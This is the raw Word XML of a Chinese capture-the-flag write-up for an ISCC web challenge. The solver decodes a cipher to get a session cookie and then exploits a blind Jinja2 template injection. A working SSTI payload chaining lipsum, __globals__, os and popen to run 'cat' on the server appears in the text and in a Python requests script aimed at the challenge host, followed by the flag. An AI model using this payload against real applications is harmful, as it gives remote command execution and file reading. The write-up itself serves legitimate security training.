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70766E9B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1F1144">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DFA74" w14:textId="1ED1F6A0" w:rsidR="00AF064E" w:rsidRDefault="00B25A25" w:rsidP="001043FF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>EB</w:t>
      </w:r>
      <w:r w:rsidR="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="005D2316" w:rsidRPr="005D2316">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十八铜人阵</w:t>
      </w:r>
      <w:r w:rsidR="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76CDE5" w14:textId="5F7F700E" w:rsidR="00AF064E" w:rsidRDefault="005D2316" w:rsidP="006D7CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="005D2316">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65E02B2D" wp14:editId="5EAA3DE9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>544195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4677428" cy="3743847"/>
            <wp:effectExtent l="0" t="0" r="889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64E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F09FC96" w14:textId="10BFA499" w:rsidR="005D2316" w:rsidRDefault="005D2316" w:rsidP="005D2316">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先</w:t>
      </w:r>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12看看：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C897BA" w14:textId="2DE86013" w:rsidR="005D2316" w:rsidRDefault="000D792B" w:rsidP="005D2316">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000D792B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6BA796A" wp14:editId="7AD0C067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4563112" cy="4391638"/>
            <wp:effectExtent l="0" t="0" r="8890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316" w:rsidRPr="005D2316">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61D9A2D6" wp14:editId="7C2A87C9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4610743" cy="24768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5DC26" w14:textId="0550ED68" w:rsidR="005D2316" w:rsidRDefault="005D2316" w:rsidP="005D2316">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一眼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>与佛论禅：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15398266" w14:textId="36FAC205" w:rsidR="005D2316" w:rsidRDefault="00FD48C4" w:rsidP="005D2316">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2316">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="102ED93B" wp14:editId="4CF21A19">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>335280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1617345"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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2316">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>编码之后post：</w:t>
      </w:r>
      <w:r w:rsidR="005D2316">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="781EE068" w14:textId="3E2FC7AC" w:rsidR="005D2316" w:rsidRDefault="005D2316" w:rsidP="00FD48C4">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E143915" w14:textId="1A8D221F" w:rsidR="005D2316" w:rsidRDefault="005D2316" w:rsidP="005D2316">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D18A9A" w14:textId="0E2A72AA" w:rsidR="00FD48C4" w:rsidRDefault="00FD48C4" w:rsidP="005D2316">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得了session：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1EEC3" w14:textId="69BA2659" w:rsidR="00FD48C4" w:rsidRDefault="00FD48C4" w:rsidP="005D2316">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>eyJhbnN3ZXJzX2NvcnJlY3QiOnRydWV9.aCP6WA.Xnc5LjNKzpQmOO_BSkOY27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C775C" w14:textId="65AD4B7B" w:rsidR="00FD48C4" w:rsidRDefault="00FD48C4" w:rsidP="005D2316">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD17693" w14:textId="7B757248" w:rsidR="00FD48C4" w:rsidRDefault="00FD48C4" w:rsidP="005D2316">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>根据提示下一个页面是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>探本穷原反着念的拼音nauygnoiqnebnat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45300708" w14:textId="4D2DE4CA" w:rsidR="005D2316" w:rsidRDefault="00FD48C4" w:rsidP="005D2316">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD48C4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74AEFA30" wp14:editId="77C0F759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3124636" cy="714475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1E5C9" w14:textId="41A29B0C" w:rsidR="00FD48C4" w:rsidRDefault="00FD48C4" w:rsidP="005D2316">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据源码是进行post请求还搭配了ssti无回显注入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206E6B2D" w14:textId="77777777" w:rsidR="00FD48C4" w:rsidRPr="00FD48C4" w:rsidRDefault="00FD48C4" w:rsidP="00FD48C4">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数方面：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FD48C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">?a1=__globals__&amp;a2=__getitem__&amp;a3=os&amp;a4=popen&amp;a5=cat%20kGf5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622F760" w14:textId="17552D0F" w:rsidR="00FD48C4" w:rsidRDefault="00FD48C4" w:rsidP="00FD48C4">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD48C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tN1yO8M&amp;a6=read&amp;a7=ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AE4841" w14:textId="11BBF38D" w:rsidR="00FD48C4" w:rsidRDefault="00FD48C4" w:rsidP="00FD48C4">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>post提交：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B29A69E" w14:textId="77777777" w:rsidR="00FD48C4" w:rsidRPr="00FD48C4" w:rsidRDefault="00FD48C4" w:rsidP="00FD48C4">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD48C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">yongzheng={{lipsum|attr(request.args.a1)|attr(request.args.a2)(request.args.a3)|attr(request.args.a4)((request.args.a5))|attr(request.args.a6)()}} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727B242A" w14:textId="57E99FBD" w:rsidR="00FD48C4" w:rsidRDefault="00FD48C4" w:rsidP="00FD48C4">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD48C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿到 flag 为 ISCC{=Hz-ay@0QcEkeR%%t*7K}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABB642F" w14:textId="1F5B974D" w:rsidR="00FD48C4" w:rsidRPr="005D2316" w:rsidRDefault="00FD48C4" w:rsidP="00FD48C4">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD48C4">
        <w:t>ISCC {=Hz-ay®0QcEkeR%t*TK}</w:t>
      </w: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543F22A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import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152087BB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</w:p>
    <w:p w14:paraId="59D487D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url = "http://112.126.73.173:16340/nauygnoiqnebnat"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B6C57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</w:p>
    <w:p w14:paraId="51570096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params = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BE6E69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"a1": "__globals__",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519E658B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"a2": "__getitem__",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AA7690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"a3": "os",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A934FD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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "a4": "popen",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606A1F80" w14:textId="29DED00D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"a5": "cat kGf5tN1yO8M",  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62476723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"a6": "read"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684C8A4C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B62649E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</w:p>
    <w:p w14:paraId="68BAE786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headers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6550EF9F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"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D058ED6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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09458D0D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</w:p>
    <w:p w14:paraId="4C40CF03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cookies = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D52952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'session': 'eyJhbnN3ZXJzX2NvcnJlY3QiOnRydWV9.aCNc1g.225oksF1SoOiZPDdO7Pj3rfN3EQ'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14301A89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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1476C3E0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</w:p>
    <w:p w14:paraId="18FC015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payload = "{{lipsum|attr(request.args.a1)|attr(request.args.a2)(request.args.a3)|attr(request.args.a4)((request.args.a5))|attr(request.args.a6)()}}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CB731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</w:p>
    <w:p w14:paraId="160A2992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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE98A14" w14:textId="1329138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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0062D20C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resp = requests.post(url, headers=headers, cookies=cookies, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A20D359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                     params=params, timeout=10, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0858F7FF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                     data={"yongzheng": payload})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582E9A66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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE60DB4" w14:textId="3284291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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA87348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resp.raise_for_status()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5B502C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6762BD3B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print("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响应内容：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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520261FD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print(resp.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407613C8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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE1B694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except requests.exceptions.HTTPError as http_err:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A25F3DA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print(f"HTTP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错误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: {http_err}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D08D2DB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except requests.exceptions.Timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468DDB2C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print("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请求超时，请检查网络连接或服务器状态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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1E08FD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except requests.exceptions.ConnectionError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4BC23A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print("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连接错误，无法访问目标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URL")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27670FA0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except requests.exceptions.RequestException as req_err:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CF3DD3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print(f"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请求异常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: {req_err}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2483932F" w14:textId="77777777" w:rsidR="005D2316" w:rsidRPr="005D2316" w:rsidRDefault="005D2316" w:rsidP="005D2316">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/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</w:pP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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A01A4B" w14:textId="66B22925" w:rsidR="00EA3779" w:rsidRPr="00EA3779" w:rsidRDefault="005D2316" w:rsidP="005D2316"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 xml:space="preserve">    print(f"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未知错误</w:t>
      </w:r>
      <w:r w:rsidRPr="005D2316">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="1C1F23"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>: {e}")</w:t>
      </w:r>
    </w:p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39B24" w14:textId="77777777" w:rsidR="00B061ED" w:rsidRDefault="00B061ED" w:rsidP="005B605D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="25B4932D" w14:textId="77777777" w:rsidR="00B061ED" w:rsidRDefault="00B061ED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38ADC" w14:textId="77777777" w:rsidR="00B061ED" w:rsidRDefault="00B061ED" w:rsidP="005B605D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3CBDB5ED" w14:textId="77777777" w:rsidR="00B061ED" w:rsidRDefault="00B061ED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0D792B"/>
    <w:rsid w:val="001043FF"/>
    <w:rsid w:val="001F1144"/>
    <w:rsid w:val="001F595E"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="003F6770"/>
    <w:rsid w:val="004148F7"/>
    <w:rsid w:val="004509D3"/>
    <w:rsid w:val="005457D8"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="005849AA"/>
    <w:rsid w:val="005B605D"/>
    <w:rsid w:val="005D2316"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="0084766E"/>
    <w:rsid w:val="008B58F1"/>
    <w:rsid w:val="00A14648"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00B061ED"/>
    <w:rsid w:val="00B25A25"/>
    <w:rsid w:val="00BB5292"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00CD7DCC"/>
    <w:rsid w:val="00DE381A"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00EA3779"/>
    <w:rsid w:val="00FD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5D2316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2025-05-16T19:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>